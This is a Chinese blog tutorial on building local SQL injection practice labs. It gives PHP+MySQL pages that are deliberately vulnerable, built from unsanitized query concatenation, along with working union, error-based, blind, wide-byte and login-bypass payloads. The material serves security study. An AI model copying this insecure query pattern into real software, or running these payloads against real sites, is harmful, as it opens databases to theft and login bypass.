常见的sql注入环境搭建

最新推荐文章于 2023-09-20 11:32:27 发布
置顶 最新推荐文章于 2023-09-20 11:32:27 发布
阅读量353 收藏 1
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Solmyr_biti/article/details/103912281
版权

By : Mirror王宇阳

 

1|1PHP+MySQL摘要

 

 

$conn = new mysqli('数据库服务器','username','password','database'); $conn = mysqli_connect('数据库服务器','username','password','database'); // 参数内容可以单独设置为一个变量引用

 

$sql = "*****";//sql命令 mysqli_query($conn,$sql); // 函数返回true/false $sql = "***1;"; $sql .= "***2;"; $sql .= "****;";//多条sql之间用分号间隔 mysqli_multi_query($conn,$sql);//执行多条sql

 

mysqli_select_db(connect,db_name);//查询db_name库 or die();//错误信息控制输出函数 die()会输出信息并退出当前脚本 mysqli_error();//返回报错信息

1|2常规回显注入

 

回显注入类型是指我们的查询内容会被应用回显到页面中;一般情况下回显注入回利用UNION联合函数来测试是否存在注入“ union select …… ”

 

<?php echo '<h1>'; echo 'SQL常规回显注入环境'; echo '</h1>'; $conn=mysqli_connect('127.0.0.1', 'root', 'root');// 连接mysql if (!$conn){//判断连接是否成功 echo '连接MySQL发生错误:'.mysqli_error($conn); }else{ echo '成功连接MySQL!'; } echo '<hr>'; // mysqli_select_db() -- 查询库,or die(str) -- 上一个函数执行错误则输出str mysqli_select_db($conn, 'text') or die ("无法正确连接到数据库!"); // mysqli_query() -- 执行sql命令 // set names utf-8 -- 写入数据库采用的编码(utf-8) mysqli_query($conn, 'set names utf-8'); // 接收参数text if(isset($_GET['text'])){ $text=$_GET['text']; } // 拼接sql语句并执行 $sql="SELECT * FROM admin WHERE uid='$text' LIMIT 0,1"; echo 'SQL拼接结果:'.$sql; echo '<hr>'; // 执行sql语句并返回结果 $result=mysqli_query($conn, $sql); $row=mysqli_fetch_array($result, MYSQLI_BOTH); if ($row){ //回显结果 echo '<table>'; echo '<tr>'; echo '<td>UID</td><td>NAME</td><td>PASS</td>'; echo '</tr><tr>'; echo '<td>'.$row['uid'].'</td>'; echo '<td>'.$row['name'].'</td>'; echo '<td>'.$row['pass'].'</td>'; echo '</tr>'; echo '</table>'; } ?>

 

' union select 1,database(),version(),4; -- +

1|3报错注入

 

报错注入类型是泛指应用页面不返回内容数据,无法从回显结果获得信息;但是一般应用都会保留SQL的查询报错mysqli_error() 通过“extractvalue UpdateXml foot”等函数来查询,但是无法查询到结果并会通过报错的方式返回结果。

 

<?php echo '<h1>'; echo 'SQL报错注入环境'; echo '</h1>'; $conn=mysqli_connect('127.0.0.1', 'root', 'root');// 连接mysql if (!$conn){//判断连接是否成功 echo '连接MySQL发生错误:'.mysqli_error($conn); }else{ echo '成功连接MySQL!'; } echo '<hr>'; // mysqli_select_db() -- 查询库,or die(str) -- 上一个函数执行错误则输出str mysqli_select_db($conn, 'text') or die ("无法正确连接到数据库!"); // mysqli_query() -- 执行sql命令 // set names utf-8 -- 写入数据库采用的编码(utf-8) mysqli_query($conn, 'set names utf-8'); if(isset($_GET['text'])){ $text=$_GET['text'];// 接收参数text } $sql = "SELECT * FROM admin WHERE uid = '$text';"; echo $sql."<hr>"; $result = mysqli_query($conn, $sql ) or die( '<pre>' . mysqli_error($conn) . '</pre>'); //mysqli_error -- 返回最近调用函数的最后一个错误描述 $row=mysqli_fetch_array($result, MYSQLI_BOTH); if($row){ echo '<table>'; echo '<tr>'; echo '<td>UID</td><td>NAME</td><td>PASS</td>'; echo '</tr><tr>'; echo '<td>'.$row['uid'].'</td>'; echo '<td>'.$row['name'].'</td>'; echo '<td>'.$row['pass'].'</td>'; echo '</tr>'; echo '</table>'; } ?> 

 

' and updatexml(1,concat(0x7e,database(),0x7e,version()),1); -- +

1|4盲注

 

盲注类型泛指无法利用回显测试等情况,进行的一种sql注入测试方法。

盲注主要分为两种:

  • 布尔盲注:通过判断页面响应确定是否正确的布尔sql拼接。
  • 时间盲注:通过sql查询的时间延迟sleep函数来测定构造的布尔sql是否成立。
 

<?php echo '<h1>'; echo 'SQL常规盲注环境'; echo '</h1>'; $conn=mysqli_connect('127.0.0.1', 'root', 'root');// 连接mysql if (!$conn){//判断连接是否成功 echo '连接MySQL发生错误:'.mysqli_error($conn); }else{ echo '成功连接MySQL!'; } echo '<hr>'; // mysqli_select_db() -- 查询库,or die(str) -- 上一个函数执行错误则输出str mysqli_select_db($conn, 'text') or die ("无法正确连接到数据库!"); // mysqli_query() -- 执行sql命令 // set names utf-8 -- 写入数据库采用的编码(utf-8) mysqli_query($conn, 'set names utf-8'); if(isset($_GET['text'])){ $text=$_GET['text'];// 接收参数text } $sql = "SELECT * FROM admin WHERE uid = '$text';"; echo $sql."<hr>"; $result = mysqli_query($conn, $sql ) ; $row=mysqli_fetch_array($result, MYSQLI_BOTH); if($row){ echo '查询结果存在!'; // echo '查询完成'; } else { echo '查询结果不存在!'; // echo '查询完成'; } /* 如上源码,当echo返回结果为第一类情况则适用布尔盲注的方法不断的猜结 当echo返回结果为第二类情况则适用时间盲注,通过时间延迟的方式来判断布尔结果并不断的猜解 */ ?>

  • 布尔盲注测试
 

' or left(database(),2)='te'; -- +

  • 时间盲注测试
 

if(ascii(substr(database(),1,1))='t',1,sleep(10)); -- +

1|5宽字节注入

 

环境构造注意:该注入环境要求mysql数据库采用GBK编码;宽字节注入与HTML页面编码是无关的,即HTML页面是UTF-8编码,只要mysql是GBK都可以存在宽字节注入;

参考文章:PHP宽字节注入 浅谈对宽字节注入的认知

 

<?php echo '<h1>'; echo 'SQL宽字节注入环境'; echo '</h1>'; $conn=mysqli_connect('127.0.0.1', 'root', 'root');// 连接mysql if (!$conn){//判断连接是否成功 echo '连接MySQL发生错误:'.mysqli_error($conn); }else{ echo '成功连接MySQL!'; } echo '<hr>'; // mysqli_select_db() -- 查询库,or die(str) -- 上一个函数执行错误则输出str mysqli_select_db($conn, 'text') or die ("无法正确连接到数据库!"); // mysqli_query() -- 执行sql命令 // set names utf-8 -- 写入数据库采用的编码(utf-8) mysqli_query($conn, 'set names gbk'); // 接收参数text if(isset($_GET['text'])){ $text=$_GET['text']; } // 拼接sql语句并执行 $sql="SELECT * FROM admin WHERE uid='$text' LIMIT 0,1"; echo 'SQL拼接结果:'.$sql; echo '<hr>'; // 执行sql语句并返回结果 $result=mysqli_query($conn, $sql); $row=mysqli_fetch_array($result, MYSQLI_BOTH); if ($row){ //回显结果 echo '<table>'; echo '<tr>'; echo '<td>UID</td><td>NAME</td><td>PASS</td>'; echo '</tr><tr>'; echo '<td>'.$row['uid'].'</td>'; echo '<td>'.$row['name'].'</td>'; echo '<td>'.$row['pass'].'</td>'; echo '</tr>'; echo '</table>'; } ?>

1|6登录框注入

 

登录框注入泛指sql直接无任何的过滤直接拼接用户名和密码来从数据库中直接查询结果并实现登录等系列功能;攻击者利用这一缺陷,直接构造一个sql之后可以越过密码的确认,也就是俗称的万能密码“admin '--+

 

<!DOCTYPE html> <html> <head> <title>SQL_login注入测试</title> <meta charset="utf-8"/> </head> <body> <form action="./sql_login.php" method="post"> <div> 用户名:<input type="text" name="name" /> </div> <div> 密码:<input type="password" name="pass" /> </div> <input type="submit" value="提交" /> </form> <div> <?php $conn=mysqli_connect('127.0.0.1', 'root', 'root');// 连接mysql if (!$conn){//判断连接是否成功 echo '连接MySQL发生错误:'.mysqli_error($conn); }else{ echo '成功连接MySQL!'; } echo '<hr>'; // mysqli_select_db() -- 查询库,or die(str) -- 上一个函数执行错误则输出str mysqli_select_db($conn, 'text') or die ("无法正确连接到数据库!"); // mysqli_query() -- 执行sql命令 // set names utf-8 -- 写入数据库采用的编码(utf-8) mysqli_query($conn, 'set names utf-8'); // 接收参数name pass $name=$_POST['name']; $pass=$_POST['pass']; // echo $name . "~" . $pass; // 拼接sql语句并执行 $sql="SELECT * FROM admin WHERE name='$name' and pass='$pass' LIMIT 0,1"; echo 'SQL拼接结果:'.$sql; echo '<hr>'; // 执行sql语句并返回结果 if($result=mysqli_query($conn, $sql)){ $row=mysqli_fetch_array($result, MYSQLI_BOTH); if ($row){ //回显结果 echo '<table>'; echo '<tr>'; echo '<td>UID</td><td>NAME</td><td>PASS</td>'; echo '</tr><tr>'; echo '<td>'.$row['uid'].'</td>'; echo '<td>'.$row['name'].'</td>'; echo '<td>'.$row['pass'].'</td>'; echo '</tr>'; echo '</table>'; } else { echo "用户名或密码错误"; } } ?> </div> </body> </html> 

 

admin'; -- +

code-is-poetry
关注
DVWA靶场环境搭建_SQL注入模拟靶机
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-08 2万+
今天讲DVWA的两个重要方面:DVWA靶场环境搭建以及SQL注入模拟靶机。DVWA介绍:在近些年网络安全的高速发展中,初学者已经很难找到一个网站进行渗透了,曾几何时,一个漏洞,一个工具就可以在网上找到很多有漏洞的网站去体验,当然渗透一个未经授权的系统是非法的。因此,为了能够较为真实地学习Web渗透的各种技术,就需要找一个专门用于学习的Web演练平台,人们将这种用于练习渗透的平台称为“靶场”。DVWA可以进行SQL注入、XSS、CSRF、文件上传等漏洞的演练,由于该系统提供了多个安全演练级别,因此可以逐步地来
SQL注入sqli-labs环境搭建
Alashan12的博客
03-17 2124
下载phpStudy和sqli压缩包 建议在虚拟机上下载安装,部分版本的phpStudy有后门 解压phpStudy到C盘目录下(虚拟机Windows7) 打开phpStudy.exe 弹出的对话框或页面关闭即可 启动phpStudy,Apache和MySQL显示绿色,若为红色请自行调试 浏览器访问本机地址127.0.0.1 出现phpStudy探针 查看虚拟机IP 宿主机访问虚拟机IP出现phpStudy探针界面 解压sqli到phpStudy...
探究mssql注入第一课 本地搭建mssql注入环境
07-29
探究mssql注入第一课 本地搭建mssql注入环境
SQL注入环境搭建与简单操作
qq_51627527的博客
12-16 676
SQL注入:DVWA+SQLmap+Mysql注入实战 实验环境搭建。启动Metasploitable2虚拟机。
sql注入学习——环境搭建
qq_49502930的博客
10-20 2196
sql注入学习——环境搭建 文章目录sql注入学习——环境搭建一、phpstudy最新版下载安装与注意事项二、sql-labs安装与注意事项三、浏览器登录127.0.0.1\sqli-labs-master总结 一、phpstudy最新版下载安装与注意事项 (1)phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer. (2)是非常方便、好用的PHP调试环境.该程序不仅包括PHP调试环境,还包括了开发工具、
SQL注入—Sqli-labs注入环境搭建
weixin_47118413的博客
04-06 8352
本文章讲解如何通过Linux(Centos 7)和Windows部署Sqli-labs环境进行sql注入漏洞相关练习,后期会更新关卡教程。
搭建SQL注入环境(一)
野原新之助
12-10 1221
环境 HTML代码: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>News</title> </head> <body> <form action="news.php" method="get...
靶场环境搭建-SQL注入平台
weixin_47193338的博客
02-11 1228
一、SQL注入平台介绍 Sqli-labs是一款学习SQL注入的开源平台,共有75种不同的注入类型。 二、安装步骤 1、下载链接:GitHub - Rinkish/Sqli_Edited_Version: Edited SQLi Audi lab series so that it can work in kali linux with PhpVersion 7+解压,放在www目录下 2、打开phpMyAdmin 3、登陆 4、点击数据库,新建数据库security 5、..
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
学习之sql注入漏洞网址的创建
06-06
学习sql注入,往往需要一个可注入的网址,这篇文章很好的解决了这个问题,我们可以自己创建一个自己用的地址来学习,可以让我们为所欲为。
mysql注入环境搭建_SQL注入系列之环境搭建(二)----PHP+Mysql注入环境搭建
weixin_36409041的博客
02-07 152
一、手写一个带sql注入的页面PHP+MySQL注入页面编写步骤1.接受参数2.连接数据库3.组合sql语句4.执行sql语句并返回显示新建一个sqltest.php的文件、并添加以下代码//fendo数据库root用户连接mysql数据库,操作user表$id= $_GET['x'];//接受get传递的参数名x的值并赋值给变量id$conn = mysql_connect('127.0.0.1...
搭建SQL注入平台
分享与记录
03-06 3179
1.phpstudy或wamp 二者下载其一,我安装的是phpstudy2018。 2.下载sql-labs sql-labs是一款学习SQL注入的开源平台,共有75种不同类型的注入,这里提供一个我白嫖(滑稽)来的下载地址:https://github.com/Audi-1/sqli-labs 下载完压缩包后并解压到phpstudy2018网站的根目录(我电脑上的路径是L:\phpstudy\P...
SQL注入系列(一)——超详细SQL注入环境搭建
weixin_49058775的博客
08-18 2511
首先准备一台:windows2008 sever 的虚拟机(如果电脑配置较低的,可以开自己本机) Phpstudy2016(个人喜好) 下载chrome浏览器(用google浏览器,存属于个人爱好哈~) https://www.xp.cn/ (phpstudy官方网站啊,不要下载一些带后门哦) 点击windows版 当然虚拟机配置跟不上的,可用本机下载,拖入虚拟机里进行安装 这个phpstudy有多个版...
SQL注入环境搭建和代码编写
Wawyw's Blog
03-07 769
测试环境: Apache2.4 php7.4 MySQL8.0.22 1、PHP + MySQL 通过PHP 可以操作MySQL中的数据,但首先需要解决的问题是PHP如何连接到MySQL? 有以下三种方式: MySQLi (面向对象) MySQLi (面向过程) PDO(PHP Data Objects) 区别在于:PDO 应用在 12 种不同数据库中, MySQLi 只针对 MySQL 数据库。 MySQLi 和 PDO在PHP安装时大多数情况下是自动安装的,可能需要做的是在PHP配置文件 php.
SQL注入之sqli-labs环境搭建
weixin_69054284的博客
09-20 2816
往往很多新手在刚学习SQL注入的时候,都需要拥有一个能SQL注入的网站,需要有的。直接去互联网上找的话对新手未免有点太难了,因此:我们一般都是在本地搭建一个能SQL注入测试的网站,那样我们学习SQL注入就容易多了。Sqli-labs是一个印度程序员写的,用来学习的一个游戏教程。
sql注入靶场环境搭建
m0_47555956的博客
10-08 1495
sql注入靶场环境搭建
SQL注入环境搭建及多种注入类型测试实验
晓宇的博客
04-14 5609
SQL注入环境搭建及多种注入类型测试实验
SQL注入环境搭建
YuSec
05-31 791
Start 本文利用docker进行环境的搭建 docker搭建环境比较简单 本文在Kali虚拟下利用docker搭建SQL注入环境 docker search sqli-labs,本文拉取第一个镜像 docker pull acgpiano/sqli-labs docker images docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs 此时环境就搭建完成了,docker搭建环境的好处就是,各个环境独立存在,不会互相干扰。 之后
sql注入如何搭建环境
最新发布
06-14
搭建SQL注入攻击环境通常涉及以下几个步骤: 1. **选择平台**: - 你可以使用虚拟机(如Vagrant或Docker)来创建一个干净的开发环境,这样可以隔离真实生产环境。 - 或者在本地服务器上安装Web服务器(如Apache或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值